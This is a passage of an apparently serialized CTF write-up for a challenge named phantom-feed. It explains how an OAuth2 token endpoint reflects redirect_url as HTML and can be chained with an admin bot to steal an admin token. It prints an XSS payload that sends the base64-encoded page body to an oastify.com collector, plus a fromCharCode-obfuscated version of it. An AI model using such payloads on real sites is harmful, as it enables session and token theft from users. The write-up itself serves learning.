time",{"type":33,"tag":128,"props":32092,"children":32093},{"style":312},[32094],{"type":38,"value":215},{"type":33,"tag":128,"props":32096,"children":32097},{"style":323},[32098],{"type":38,"value":32099},"sleep",{"type":33,"tag":128,"props":32101,"children":32102},{"style":312},[32103],{"type":38,"value":5566},{"type":33,"tag":128,"props":32105,"children":32106},{"style":523},[32107],{"type":38,"value":32108},"10",{"type":33,"tag":128,"props":32110,"children":32111},{"style":312},[32112],{"type":38,"value":2427},{"type":33,"tag":128,"props":32114,"children":32115},{"class":130,"line":1127},[32116,32120,32124,32129],{"type":33,"tag":128,"props":32117,"children":32118},{"style":323},[32119],{"type":38,"value":31599},{"type":33,"tag":128,"props":32121,"children":32122},{"style":312},[32123],{"type":38,"value":215},{"type":33,"tag":128,"props":32125,"children":32126},{"style":323},[32127],{"type":38,"value":32128},"quit",{"type":33,"tag":128,"props":32130,"children":32131},{"style":312},[32132],{"type":38,"value":7857},{"type":33,"tag":47,"props":32134,"children":32135},{},[32136],{"type":38,"value":32137},"Furthermore, it is important to note that this bot have an administrator token in their cookie. However, this token can only be used on the service of port 3000. We need to find a way to have a valid token on port 4000. This is what we will detail in the next chapter.",{"type":33,"tag":40,"props":32139,"children":32141},{"id":32140},"oauth2-into-xss",[32142],{"type":38,"value":32143},"Oauth2 into XSS",{"type":33,"tag":47,"props":32145,"children":32146},{},[32147,32149,32155],{"type":38,"value":32148},"The routes of the port service 4000 are only accessible via the header ",{"type":33,"tag":105,"props":32150,"children":32152},{"className":32151},[],[32153],{"type":38,"value":32154},"Authorization: Bearer \u003CJWT>",{"type":38,"value":32156},". The JWT must be generated beforehand using the oauth2 functionality located on port 3000.",{"type":33,"tag":47,"props":32158,"children":32159},{},[32160],{"type":38,"value":32161},"We will detail these routes below:",{"type":33,"tag":239,"props":32163,"children":32164},{},[32165],{"type":33,"tag":243,"props":32166,"children":32167},{},[32168,32174,32175,32179,32184,32186,32189,32194,32196,32199,32204],{"type":33,"tag":105,"props":32169,"children":32171},{"className":32170},[],[32172],{"type":38,"value":32173},"/oauth2/auth",{"type":38,"value":284},{"type":33,"tag":32176,"props":32177,"children":32178},"br",{},[],{"type":33,"tag":2572,"props":32180,"children":32181},{},[32182],{"type":38,"value":32183},"Method",{"type":38,"value":32185},": GET",{"type":33,"tag":32176,"props":32187,"children":32188},{},[],{"type":33,"tag":2572,"props":32190,"children":32191},{},[32192],{"type":38,"value":32193},"Parameters",{"type":38,"value":32195},": client_id, redirect_url",{"type":33,"tag":32176,"props":32197,"children":32198},{},[],{"type":33,"tag":2572,"props":32200,"children":32201},{},[32202],{"type":38,"value":32203},"Description",{"type":38,"value":32205},": This route generates an OAuth2 authorization page using the \"oauth2.html\" template. It passes in the title, client_id, and redirect_url as variables to the template. This page is likely where the user would enter their credentials to authorize the OAuth2 request.",{"type":33,"tag":34,"props":32207,"children":32208},{"id":8},[],{"type":33,"tag":239,"props":32210,"children":32211},{},[32212],{"type":33,"tag":243,"props":32213,"children":32214},{},[32215,32221,32222,32225,32229,32230,32233,32237,32238,32241,32245],{"type":33,"tag":105,"props":32216,"children":32218},{"className":32217},[],[32219],{"type":38,"value":32220},"oauth2/code",{"type":38,"value":284},{"type":33,"tag":32176,"props":32223,"children":32224},{},[],{"type":33,"tag":2572,"props":32226,"children":32227},{},[32228],{"type":38,"value":32183},{"type":38,"value":32185},{"type":33,"tag":32176,"props":32231,"children":32232},{},[],{"type":33,"tag":2572,"props":32234,"children":32235},{},[32236],{"type":38,"value":32193},{"type":38,"value":32195},{"type":33,"tag":32176,"props":32239,"children":32240},{},[],{"type":33,"tag":2572,"props":32242,"children":32243},{},[32244],{"type":38,"value":32203},{"type":38,"value":32246},": This route constructs a URL containing the authorization code as a query parameter and redirects the user to this URL using a 303 status code. This is typically the URL of the client application that initiated the OAuth2 request. The client application can then use this authorization code to request an access token from the server.",{"type":33,"tag":34,"props":32248,"children":32250},{"id":32249},"_1",[],{"type":33,"tag":239,"props":32252,"children":32253},{},[32254],{"type":33,"tag":243,"props":32255,"children":32256},{},[32257,32263,32264,32267,32271,32272,32275,32279,32281,32284,32288,32290,32294,32297,32302],{"type":33,"tag":105,"props":32258,"children":32260},{"className":32259},[],[32261],{"type":38,"value":32262},"/oauth2/token",{"type":38,"value":284},{"type":33,"tag":32176,"props":32265,"children":32266},{},[],{"type":33,"tag":2572,"props":32268,"children":32269},{},[32270],{"type":38,"value":32183},{"type":38,"value":32185},{"type":33,"tag":32176,"props":32273,"children":32274},{},[],{"type":33,"tag":2572,"props":32276,"children":32277},{},[32278],{"type":38,"value":32193},{"type":38,"value":32280},": client_id, redirect_url, authorization_code",{"type":33,"tag":32176,"props":32282,"children":32283},{},[],{"type":33,"tag":2572,"props":32285,"children":32286},{},[32287],{"type":38,"value":32203},{"type":38,"value":32289},": This route check the validity of the provided authorization code. It retrieves the associated record from the database, verifies the client_id and redirect_url, and checks if the authorization code has expired. If the authorization code is valid, it generates an access token and returns it to the client.",{"type":33,"tag":34,"props":32291,"children":32293},{"id":32292},"_2",[],{"type":33,"tag":32176,"props":32295,"children":32296},{},[],{"type":33,"tag":2302,"props":32298,"children":32299},{},[32300],{"type":38,"value":32301},"Note: The client_id and redirect_url parameters need to match the values used to generate the authorization code.",{"type":33,"tag":34,"props":32303,"children":32305},{"id":32304},"_3",[],{"type":33,"tag":47,"props":32307,"children":32308},{},[32309,32311,32317,32319,32324],{"type":38,"value":32310},"If we recap, the routes that interest us are the last two. The flow that allows us to obtain a token for the service 4000 is as follows: we call the ",{"type":33,"tag":105,"props":32312,"children":32314},{"className":32313},[],[32315],{"type":38,"value":32316},"/oauth2/code",{"type":38,"value":32318}," route to initialize the oauth2 request, this route return a 303 with authorization code as a query parameter. Then we call the ",{"type":33,"tag":105,"props":32320,"children":32322},{"className":32321},[],[32323],{"type":38,"value":32262},{"type":38,"value":32325}," route with the authorization code to obtain a valid token.",{"type":33,"tag":47,"props":32327,"children":32328},{},[32329],{"type":38,"value":32330},"oauth2/code:",{"type":33,"tag":75,"props":32332,"children":32334},{"imgSrc":32333},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704313648/writeups/phantom-feed/oauth2_code.webp",[],{"type":33,"tag":47,"props":32336,"children":32337},{},[32338],{"type":38,"value":32339},"oauth2/token:",{"type":33,"tag":75,"props":32341,"children":32343},{"imgSrc":32342},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704313664/writeups/phantom-feed/oauth2_token.webp",[],{"type":33,"tag":47,"props":32345,"children":32346},{},[32347,32349,32355,32357,32363],{"type":38,"value":32348},"If we carefully examine the headers of the last request, we can see that the content type is: ",{"type":33,"tag":105,"props":32350,"children":32352},{"className":32351},[],[32353],{"type":38,"value":32354},"text/html",{"type":38,"value":32356},". Furthermore, the ",{"type":33,"tag":105,"props":32358,"children":32360},{"className":32359},[],[32361],{"type":38,"value":32362},"redirect_url",{"type":38,"value":32364}," is a parameter that we control and we can see that it is reflected in the response, indicating that this endpoint is vulnerable to XSS.",{"type":33,"tag":75,"props":32366,"children":32368},{"imgSrc":32367},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704313866/writeups/phantom-feed/content_type_response_token.webp",[],{"type":33,"tag":47,"props":32370,"children":32371},{},[32372],{"type":38,"value":32373},"In our case, it would be interesting to manipulate the bot by using an open redirect to force it to utilize this OAuth2 flow. By exploiting the XSS vulnerability when the token is generated and obtaining the HTML body, we can steal the admin token that is usable in the service at port 4000.",{"type":33,"tag":47,"props":32375,"children":32376},{},[32377],{"type":38,"value":32378},"To do this, we will use the following XSS payload to steal the body of the HTML:",{"type":33,"tag":114,"props":32380,"children":32381},{"lang":5929},[32382],{"type":33,"tag":119,"props":32383,"children":32385},{"className":5933,"code":32384,"language":5929,"meta":8,"style":8},"\u003Cimg src=x onerror='window.location = `http://lc1azv4ne9wwxnmfx2bzw6zdj4p2dt1i.oastify.com/?body=${btoa(document.body.innerHTML)}`'>\n",[32386],{"type":33,"tag":105,"props":32387,"children":32388},{"__ignoreMap":8},[32389],{"type":33,"tag":128,"props":32390,"children":32391},{"class":130,"line":131},[32392,32396,32401,32405,32409,32414,32419,32423,32427,32432,32436,32441,32445,32449,32454,32459,32463],{"type":33,"tag":128,"props":32393,"children":32394},{"style":312},[32395],{"type":38,"value":5977},{"type":33,"tag":128,"props":32397,"children":32398},{"style":1576},[32399],{"type":38,"value":32400},"img",{"type":33,"tag":128,"props":32402,"children":32403},{"style":306},[32404],{"type":38,"value":15069},{"type":33,"tag":128,"props":32406,"children":32407},{"style":312},[32408],{"type":38,"value":315},{"type":33,"tag":128,"props":32410,"children":32411},{"style":140},[32412],{"type":38,"value":32413},"x",{"type":33,"tag":128,"props":32415,"children":32416},{"style":306},[32417],{"type":38,"value":32418}," onerror",{"type":33,"tag":128,"props":32420,"children":32421},{"style":312},[32422],{"type":38,"value":315},{"type":33,"tag":128,"props":32424,"children":32425},{"style":676},[32426],{"type":38,"value":6040},{"type":33,"tag":128,"props":32428,"children":32429},{"style":140},[32430],{"type":38,"value":32431},"window",{"type":33,"tag":128,"props":32433,"children":32434},{"style":312},[32435],{"type":38,"value":215},{"type":33,"tag":128,"props":32437,"children":32438},{"style":140},[32439],{"type":38,"value":32440},"location ",{"type":33,"tag":128,"props":32442,"children":32443},{"style":312},[32444],{"type":38,"value":315},{"type":33,"tag":128,"props":32446,"children":32447},{"style":676},[32448],{"type":38,"value":5710},{"type":33,"tag":128,"props":32450,"children":32451},{"style":140},[32452],{"type":38,"value":32453},"http:",{"type":33,"tag":128,"props":32455,"children":32456},{"style":5541},[32457],{"type":38,"value":32458},"//lc1azv4ne9wwxnmfx2bzw6zdj4p2dt1i.oastify.com/?body=${btoa(document.body.innerHTML)}`",{"type":33,"tag":128,"props":32460,"children":32461},{"style":676},[32462],{"type":38,"value":6040},{"type":33,"tag":128,"props":32464,"children":32465},{"style":312},[32466],{"type":38,"value":6097},{"type":33,"tag":47,"props":32468,"children":32469},{},[32470],{"type":38,"value":32471},"To ensure that the script is executed correctly, we will encode our payload with String.fromCharCode.",{"type":33,"tag":114,"props":32473,"children":32474},{"lang":5929},[32475],{"type":33,"tag":119,"props":32476,"children":32478},{"className":5933,"code":32477,"language":5929,"meta":8,"style":8},"\u003Cimg src=x onerror='eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,96,104,116,116,112,58,47,47,108,99,49,97,122,118,52,110,101,57,119,119,120,110,109,102,120,50,98,122,119,54,122,100,106,52,112,50,100,116,49,105,46,111,97,115,116,105,102,121,46,99,111,109,47,63,98,111,100,121,61,36,123,98,116,111,97,40,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,72,84,77,76,41,125,96))'>\n",[32479],{"type":33,"tag":105,"props":32480,"children":32481},{"__ignoreMap":8},[32482],{"type":33,"tag":128,"props":32483,"children":32484},{"class":130,"line":131},[32485,32489,32493,32497,32501,32505,32509,32513,32517,32522,32526,32530,32534,32539,32543,32548,32552,32557,32561,32566,32570,32575,32579,32584,32588,32592,32596,32601,32605,32610,32614,32618,32622,32627,32631,32636,32640,32645,32649,32653,32657,32661,32665,32669,32673,32677,32681,32686,32690,32694,32698,32703,32707,32712,32716,32720,32724,32728,32732,32737,32741,32746,32750,32755,32759,32763,32767,32771,32775,32779,32783,32788,32792,32796,32800,32805,32809,32814,32818,32823,32827,32831,32835,32840,32844,32849,32853,32857,32861,32865,32869,32874,32878,32882,32886,32891,32895,32900,32904,32908,32912,32917,32921,32926,32930,32934,32938,32942,32946,32951,32955,32959,32963,32967,32971,32976,32980,32984,32988,32992,32996,33000,33004,33008,33012,33016,33020,33024,33028,33032,33036,33040,33044,33048,33052,33056,33060,33065,33069,33073,33077,33081,33085,33089,33093,33098,33102,33106,33110,33114,33118,33122,33126,33130,33134,33138,33142,33147,33151,33155,33159,33163,33167,33171,33175,33179,33183,33187,33191,33196,33200,33205,33209,33213,33217,33221,33225,33229,33233,33237,33241,33246,33250,33254,33258,33262,33266,33270,33274,33279,33283,33287,33291,33295,33299,33303,33307,33311,33315,33319,33323,33327,33331,33335,33339,33343,33347,33351,33355,33359,33363,33367,33371,33375,33379,33383,33387,33391,33395,33400,33404,33409,33413,33418,33422,33427,33431,33436,33440,33445,33449,33454,33458,33462,33466,33470],{"type":33,"tag":128,"props":32486,"children":32487},{"style":312},[32488],{"type":38,"value":5977},{"type":33,"tag":128,"props":32490,"children":32491},{"style":1576},[32492],{"type":38,"value":32400},{"type":33,"tag":128,"props":32494,"children":32495},{"style":306},[32496],{"type":38,"value":15069},{"type":33,"tag":128,"props":32498,"children":32499},{"style":312},[32500],{"type":38,"value":315},{"type":33,"tag":128,"props":32502,"children":32503},{"style":140},[32504],{"type":38,"value":32413},{"type":33,"tag":128,"props":32506,"children":32507},{"style":306},[32508],{"type":38,"value":32418},{"type":33,"tag":128,"props":32510,"children":32511},{"style":312},[32512],{"type":38,"value":315},{"type":33,"tag":128,"props":32514,"children":32515},{"style":676},[32516],{"type":38,"value":6040},{"type":33,"tag":128,"props":32518,"children":32519},{"style":135},[32520],{"type":38,"value":32521},"eval",{"type":33,"tag":128,"props":32523,"children":32524},{"style":312},[32525],{"type":38,"value":5566},{"type":33,"tag":128,"props":32527,"children":32528},{"style":140},[32529],{"type":38,"value":25569},{"type":33,"tag":128,"props":32531,"children":32532},{"style":312},[32533],{"type":38,"value":215},{"type":33,"tag":128,"props":32535,"children":32536},{"style":135},[32537],{"type":38,"value":32538},"fromCharCode",{"type":33,"tag":128,"props":32540,"children":32541},{"style":312},[32542],{"type":38,"value":5566},{"type":33,"tag":128,"props":32544,"children":32545},{"style":523},[32546],{"type":38,"value":32547},"119",{"type":33,"tag":128,"props":32549,"children":32550},{"style":312},[32551],{"type":38,"value":5584},{"type":33,"tag":128,"props":32553,"children":32554},{"style":523},[32555],{"type":38,"value":32556},"105",{"type":33,"tag":128,"props":32558,"children":32559},{"style":312},[32560],{"type":38,"value":5584},{"type":33,"tag":128,"props":32562,"children":32563},{"style":523},[32564],{"type":38,"value":32565},"110",{"type":33,"tag":128,"props":32567,"children":32568},{"style":312},[32569],{"type":38,"value":5584},{"type":33,"tag":128,"props":32571,"children":32572},{"style":523},[32573],{"type":38,"value":32574},"100",{"type":33,"tag":128,"props":32576,"children":32577},{"style":312},[32578],{"type":38,"value":5584},{"type":33,"tag":128,"props":32580,"children":32581},{"style":523},[32582],{"type":38,"value":32583},"111",{"type":33,"tag":128,"props":32585,"children":32586},{"style":312},[32587],{"type":38,"value":5584},{"type":33,"tag":128,"props":32589,"children":32590},{"style":523},[32591],{"type":38,"value":32547},{"type":33,"tag":128,"props":32593,"children":32594},{"style":312},[32595],{"type":38,"value":5584},{"type":33,"tag":128,"props":32597,"children":32598},{"style":523},[32599],{"type":38,"value":32600},"46",{"type":33,"tag":128,"props":32602,"children":32603},{"style":312},[32604],{"type":38,"value":5584},{"type":33,"tag":128,"props":32606,"children":32607},{"style":523},[32608],{"type":38,"value":32609},"108",{"type":33,"tag":128,"props":32611,"children":32612},{"style":312},[32613],{"type":38,"value":5584},{"type":33,"tag":128,"props":32615,"children":32616},{"style":523},[32617],{"type":38,"value":32583},{"type":33,"tag":128,"props":32619,"children":32620},{"style":312},[32621],{"type":38,"value":5584},{"type":33,"tag":128,"props":32623,"children":32624},{"style":523},[32625],{"type":38,"value":32626},"99",{"type":33,"tag":128,"props":32628,"children":32629},{"style":312},[32630],{"type":38,"value":5584},{"type":33,"tag":128,"props":32632,"children":32633},{"style":523},[32634],{"type":38,"value":32635},"97",{"type":33,"tag":128,"props":32637,"children":32638},{"style":312},[32639],{"type":38,"value":5584},{"type":33,"tag":128,"props":32641,"children":32642},{"style":523},[32643],{"type":38,"value":32644},"116",{"type":33,"tag":128,"props":32646,"children":32647},{"style":312},[32648],{"type":38,"value":5584},{"type":33,"tag":128,"props":32650,"children":32651},{"style":523},[32652],{"type":38,"value":32556},{"type":33,"tag":128,"props":32654,"children":32655},{"style":312},[32656],{"type":38,"value":5584},{"type":33,"tag":128,"props":32658,"children":32659},{"style":523},[32660],{"type":38,"value":32583},{"type":33,"tag":128,"props":32662,"children":32663},{"style":312},[32664],{"type":38,"value":5584},{"type":33,"tag":128,"props":32666,"children":32667},{"style":523},[32668],{"type":38,"value":32565},{"type":33,"tag":128,"props":32670,"children":32671},{"style":312},[32672],{"type":38,"value":5584},{"type":33,"tag":128,"props":32674,"children":32675},{"style":523},[32676],{"type":38,"value":12334},{"type":33,"tag":128,"props":32678,"children":32679},{"style":312},[32680],{"type":38,"value":5584},{"type":33,"tag":128,"props":32682,"children":32683},{"style":523},[32684],{"type":38,"value":32685},"61",{"type":33,"tag":128,"props":32687,"children":32688},{"style":312},[32689],{"type":38,"value":5584},{"type":33,"tag":128,"props":32691,"children":32692},{"style":523},[32693],{"type":38,"value":12334},{"type":33,"tag":128,"props":32695,"children":32696},{"style":312},[32697],{"type":38,"value":5584},{"type":33,"tag":128,"props":32699,"children":32700},{"style":523},[32701],{"type":38,"value":32702},"96",{"type":33,"tag":128,"props":32704,"children":32705},{"style":312},[32706],{"type":38,"value":5584},{"type":33,"tag":128,"props":32708,"children":32709},{"style":523},[32710],{"type":38,"value":32711},"104",{"type":33,"tag":128,"props":32713,"children":32714},{"style":312},[32715],{"type":38,"value":5584},{"type":33,"tag":128,"props":32717,"children":32718},{"style":523},[32719],{"type":38,"value":32644},{"type":33,"tag":128,"props":32721,"children":32722},{"style":312},[32723],{"type":38,"value":5584},{"type":33,"tag":128,"props":32725,"children":32726},{"style":523},[32727],{"type":38,"value":32644},{"type":33,"tag":128,"props":32729,"children":32730},{"style":312},[32731],{"type":38,"value":5584},{"type":33,"tag":128,"props":32733,"children":32734},{"style":523},[32735],{"type":38,"value":32736},"112",{"type":33,"tag":128,"props":32738,"children":32739},{"style":312},[32740],{"type":38,"value":5584},{"type":33,"tag":128,"props":32742,"children":32743},{"style":523},[32744],{"type":38,"value":32745},"58",{"type":33,"tag":128,"props":32747,"children":32748},{"style":312},[32749],{"type":38,"value":5584},{"type":33,"tag":128,"props":32751,"children":32752},{"style":523},[32753],{"type":38,"value":32754},"47",{"type":33,"tag":128,"props":32756,"children":32757},{"style":312},[32758],{"type":38,"value":5584},{"type":33,"tag":128,"props":32760,"children":32761},{"style":523},[32762],{"type":38,"value":32754},{"type":33,"tag":128,"props":32764,"children":32765},{"style":312},[32766],{"type":38,"value":5584},{"type":33,"tag":128,"props":32768,"children":32769},{"style":523},[32770],{"type":38,"value":32609},{"type":33,"tag":128,"props":32772,"children":32773},{"style":312},[32774],{"type":38,"value":5584},{"type":33,"tag":128,"props":32776,"children":32777},{"style":523},[32778],{"type":38,"value":32626},{"type":33,"tag":128,"props":32780,"children":32781},{"style":312},[32782],{"type":38,"value":5584},{"type":33,"tag":128,"props":32784,"children":32785},{"style":523},[32786],{"type":38,"value":32787},"49",{"type":33,"tag":128,"props":32789,"children":32790},{"style":312},[32791],{"type":38,"value":5584},{"type":33,"tag":128,"props":32793,"children":32794},{"style":523},[32795],{"type":38,"value":32635},{"type":33,"tag":128,"props":32797,"children":32798},{"style":312},[32799],{"type":38,"value":5584},{"type":33,"tag":128,"props":32801,"children":32802},{"style":523},[32803],{"type":38,"value":32804},"122",{"type":33,"tag":128,"props":32806,"children":32807},{"style":312},[32808],{"type":38,"value":5584},{"type":33,"tag":128,"props":32810,"children":32811},{"style":523},[32812],{"type":38,"value":32813},"118",{"type":33,"tag":128,"props":32815,"children":32816},{"style":312},[32817],{"type":38,"value":5584},{"type":33,"tag":128,"props":32819,"children":32820},{"style":523},[32821],{"type":38,"value":32822},"52",{"type":33,"tag":128,"props":32824,"children":32825},{"style":312},[32826],{"type":38,"value":5584},{"type":33,"tag":128,"props":32828,"children":32829},{"style":523},[32830],{"type":38,"value":32565},{"type":33,"tag":128,"props":32832,"children":32833},{"style":312},[32834],{"type":38,"value":5584},{"type":33,"tag":128,"props":32836,"children":32837},{"style":523},[32838],{"type":38,"value":32839},"101",{"type":33,"tag":128,"props":32841,"children":32842},{"style":312},[32843],{"type":38,"value":5584},{"type":33,"tag":128,"props":32845,"children":32846},{"style":523},[32847],{"type":38,"value":32848},"57",{"type":33,"tag":128,"props":32850,"children":32851},{"style":312},[32852],{"type":38,"value":5584},{"type":33,"tag":128,"props":32854,"children":32855},{"style":523},[32856],{"type":38,"value":32547},{"type":33,"tag":128,"props":32858,"children":32859},{"style":312},[32860],{"type":38,"value":5584},{"type":33,"tag":128,"props":32862,"children":32863},{"style":523},[32864],{"type":38,"value":32547},{"type":33,"tag":128,"props":32866,"children":32867},{"style":312},[32868],{"type":38,"value":5584},{"type":33,"tag":128,"props":32870,"children":32871},{"style":523},[32872],{"type":38,"value":32873},"120",{"type":33,"tag":128,"props":32875,"children":32876},{"style":312},[32877],{"type":38,"value":5584},{"type":33,"tag":128,"props":32879,"children":32880},{"style":523},[32881],{"type":38,"value":32565},{"type":33,"tag":128,"props":32883,"children":32884},{"style":312},[32885],{"type":38,"value":5584},{"type":33,"tag":128,"props":32887,"children":32888},{"style":523},[32889],{"type":38,"value":32890},"109",{"type":33,"tag":128,"props":32892,"children":32893},{"style":312},[32894],{"type":38,"value":5584},{"type":33,"tag":128,"props":32896,"children":32897},{"style":523},[32898],{"type":38,"value":32899},"102",{"type":33,"tag":128,"props":32901,"children":32902},{"style":312},[32903],{"type":38,"value":5584},{"type":33,"tag":128,"props":32905,"children":32906},{"style":523},[32907],{"type":38,"value":32873},{"type":33,"tag":128,"props":32909,"children":32910},{"style":312},[32911],{"type":38,"value":5584},{"type":33,"tag":128,"props":32913,"children":32914},{"style":523},[32915],{"type":38,"value":32916},"50",{"type":33,"tag":128,"props":32918,"children":32919},{"style":312},[32920],{"type":38,"value":5584},{"type":33,"tag":128,"props":32922,"children":32923},{"style":523},[32924],{"type":38,"value":32925},"98",{"type":33,"tag":128,"props":32927,"children":32928},{"style":312},[32929],{"type":38,"value":5584},{"type":33,"tag":128,"props":32931,"children":32932},{"style":523},[32933],{"type":38,"value":32804},{"type":33,"tag":128,"props":32935,"children":32936},{"style":312},[32937],{"type":38,"value":5584},{"type":33,"tag":128,"props":32939,"children":32940},{"style":523},[32941],{"type":38,"value":32547},{"type":33,"tag":128,"props":32943,"children":32944},{"style":312},[32945],{"type":38,"value":5584},{"type":33,"tag":128,"props":32947,"children":32948},{"style":523},[32949],{"type":38,"value":32950},"54",{"type":33,"tag":128,"props":32952,"children":32953},{"style":312},[32954],{"type":38,"value":5584},{"type":33,"tag":128,"props":32956,"children":32957},{"style":523},[32958],{"type":38,"value":32804},{"type":33,"tag":128,"props":32960,"children":32961},{"style":312},[32962],{"type":38,"value":5584},{"type":33,"tag":128,"props":32964,"children":32965},{"style":523},[32966],{"type":38,"value":32574},{"type":33,"tag":128,"props":32968,"children":32969},{"style":312},[32970],{"type":38,"value":5584},{"type":33,"tag":128,"props":32972,"children":32973},{"style":523},[32974],{"type":38,"value":32975},"106",{"type":33,"tag":128,"props":32977,"children":32978},{"style":312},[32979],{"type":38,"value":5584},{"type":33,"tag":128,"props":32981,"children":32982},{"style":523},[32983],{"type":38,"value":32822},{"type":33,"tag":128,"props":32985,"children":32986},{"style":312},[32987],{"type":38,"value":5584},{"type":33,"tag":128,"props":32989,"children":32990},{"style":523},[32991],{"type":38,"value":32736},{"type":33,"tag":128,"props":32993,"children":32994},{"style":312},[32995],{"type":38,"value":5584},{"type":33,"tag":128,"props":32997,"children":32998},{"style":523},[32999],{"type":38,"value":32916},{"type":33,"tag":128,"props":33001,"children":33002},{"style":312},[33003],{"type":38,"value":5584},{"type":33,"tag":128,"props":33005,"children":33006},{"style":523},[33007],{"type":38,"value":32574},{"type":33,"tag":128,"props":33009,"children":33010},{"style":312},[33011],{"type":38,"value":5584},{"type":33,"tag":128,"props":33013,"children":33014},{"style":523},[33015],{"type":38,"value":32644},{"type":33,"tag":128,"props":33017,"children":33018},{"style":312},[33019],{"type":38,"value":5584},{"type":33,"tag":128,"props":33021,"children":33022},{"style":523},[33023],{"type":38,"value":32787},{"type":33,"tag":128,"props":33025,"children":33026},{"style":312},[33027],{"type":38,"value":5584},{"type":33,"tag":128,"props":33029,"children":33030},{"style":523},[33031],{"type":38,"value":32556},{"type":33,"tag":128,"props":33033,"children":33034},{"style":312},[33035],{"type":38,"value":5584},{"type":33,"tag":128,"props":33037,"children":33038},{"style":523},[33039],{"type":38,"value":32600},{"type":33,"tag":128,"props":33041,"children":33042},{"style":312},[33043],{"type":38,"value":5584},{"type":33,"tag":128,"props":33045,"children":33046},{"style":523},[33047],{"type":38,"value":32583},{"type":33,"tag":128,"props":33049,"children":33050},{"style":312},[33051],{"type":38,"value":5584},{"type":33,"tag":128,"props":33053,"children":33054},{"style":523},[33055],{"type":38,"value":32635},{"type":33,"tag":128,"props":33057,"children":33058},{"style":312},[33059],{"type":38,"value":5584},{"type":33,"tag":128,"props":33061,"children":33062},{"style":523},[33063],{"type":38,"value":33064},"115",{"type":33,"tag":128,"props":33066,"children":33067},{"style":312},[33068],{"type":38,"value":5584},{"type":33,"tag":128,"props":33070,"children":33071},{"style":523},[33072],{"type":38,"value":32644},{"type":33,"tag":128,"props":33074,"children":33075},{"style":312},[33076],{"type":38,"value":5584},{"type":33,"tag":128,"props":33078,"children":33079},{"style":523},[33080],{"type":38,"value":32556},{"type":33,"tag":128,"props":33082,"children":33083},{"style":312},[33084],{"type":38,"value":5584},{"type":33,"tag":128,"props":33086,"children":33087},{"style":523},[33088],{"type":38,"value":32899},{"type":33,"tag":128,"props":33090,"children":33091},{"style":312},[33092],{"type":38,"value":5584},{"type":33,"tag":128,"props":33094,"children":33095},{"style":523},[33096],{"type":38,"value":33097},"121",{"type":33,"tag":128,"props":33099,"children":33100},{"style":312},[33101],{"type":38,"value":5584},{"type":33,"tag":128,"props":33103,"children":33104},{"style":523},[33105],{"type":38,"value":32600},{"type":33,"tag":128,"props":33107,"children":33108},{"style":312},[33109],{"type":38,"value":5584},{"type":33,"tag":128,"props":33111,"children":33112},{"style":523},[33113],{"type":38,"value":32626},{"type":33,"tag":128,"props":33115,"children":33116},{"style":312},[33117],{"type":38,"value":5584},{"type":33,"tag":128,"props":33119,"children":33120},{"style":523},[33121],{"type":38,"value":32583},{"type":33,"tag":128,"props":33123,"children":33124},{"style":312},[33125],{"type":38,"value":5584},{"type":33,"tag":128,"props":33127,"children":33128},{"style":523},[33129],{"type":38,"value":32890},{"type":33,"tag":128,"props":33131,"children":33132},{"style":312},[33133],{"type":38,"value":5584},{"type":33,"tag":128,"props":33135,"children":33136},{"style":523},[33137],{"type":38,"value":32754},{"type":33,"tag":128,"props":33139,"children":33140},{"style":312},[33141],{"type":38,"value":5584},{"type":33,"tag":128,"props":33143,"children":33144},{"style":523},[33145],{"type":38,"value":33146},"63",{"type":33,"tag":128,"props":33148,"children":33149},{"style":312},[33150],{"type":38,"value":5584},{"type":33,"tag":128,"props":33152,"children":33153},{"style":523},[33154],{"type":38,"value":32925},{"type":33,"tag":128,"props":33156,"children":33157},{"style":312},[33158],{"type":38,"value":5584},{"type":33,"tag":128,"props":33160,"children":33161},{"style":523},[33162],{"type":38,"value":32583},{"type":33,"tag":128,"props":33164,"children":33165},{"style":312},[33166],{"type":38,"value":5584},{"type":33,"tag":128,"props":33168,"children":33169},{"style":523},[33170],{"type":38,"value":32574},{"type":33,"tag":128,"props":33172,"children":33173},{"style":312},[33174],{"type":38,"value":5584},{"type":33,"tag":128,"props":33176,"children":33177},{"style":523},[33178],{"type":38,"value":33097},{"type":33,"tag":128,"props":33180,"children":33181},{"style":312},[33182],{"type":38,"value":5584},{"type":33,"tag":128,"props":33184,"children":33185},{"style":523},[33186],{"type":38,"value":32685},{"type":33,"tag":128,"props":33188,"children":33189},{"style":312},[33190],{"type":38,"value":5584},{"type":33,"tag":128,"props":33192,"children":33193},{"style":523},[33194],{"type":38,"value":33195},"36",{"type":33,"tag":128,"props":33197,"children":33198},{"style":312},[33199],{"type":38,"value":5584},{"type":33,"tag":128,"props":33201,"children":33202},{"style":523},[33203],{"type":38,"value":33204},"123",{"type":33,"tag":128,"props":33206,"children":33207},{"style":312},[33208],{"type":38,"value":5584},{"type":33,"tag":128,"props":33210,"children":33211},{"style":523},[33212],{"type":38,"value":32925},{"type":33,"tag":128,"props":33214,"children":33215},{"style":312},[33216],{"type":38,"value":5584},{"type":33,"tag":128,"props":33218,"children":33219},{"style":523},[33220],{"type":38,"value":32644},{"type":33,"tag":128,"props":33222,"children":33223},{"style":312},[33224],{"type":38,"value":5584},{"type":33,"tag":128,"props":33226,"children":33227},{"style":523},[33228],{"type":38,"value":32583},{"type":33,"tag":128,"props":33230,"children":33231},{"style":312},[33232],{"type":38,"value":5584},{"type":33,"tag":128,"props":33234,"children":33235},{"style":523},[33236],{"type":38,"value":32635},{"type":33,"tag":128,"props":33238,"children":33239},{"style":312},[33240],{"type":38,"value":5584},{"type":33,"tag":128,"props":33242,"children":33243},{"style":523},[33244],{"type":38,"value":33245},"40",{"type":33,"tag":128,"props":33247,"children":33248},{"style":312},[33249],{"type":38,"value":5584},{"type":33,"tag":128,"props":33251,"children":33252},{"style":523},[33253],{"type":38,"value":32574},{"type":33,"tag":128,"props":33255,"children":33256},{"style":312},[33257],{"type":38,"value":5584},{"type":33,"tag":128,"props":33259,"children":33260},{"style":523},[33261],{"type":38,"value":32583},{"type":33,"tag":128,"props":33263,"children":33264},{"style":312},[33265],{"type":38,"value":5584},{"type":33,"tag":128,"props":33267,"children":33268},{"style":523},[33269],{"type":38,"value":32626},{"type":33,"tag":128,"props":33271,"children":33272},{"style":312},[33273],{"type":38,"value":5584},{"type":33,"tag":128,"props":33275,"children":33276},{"style":523},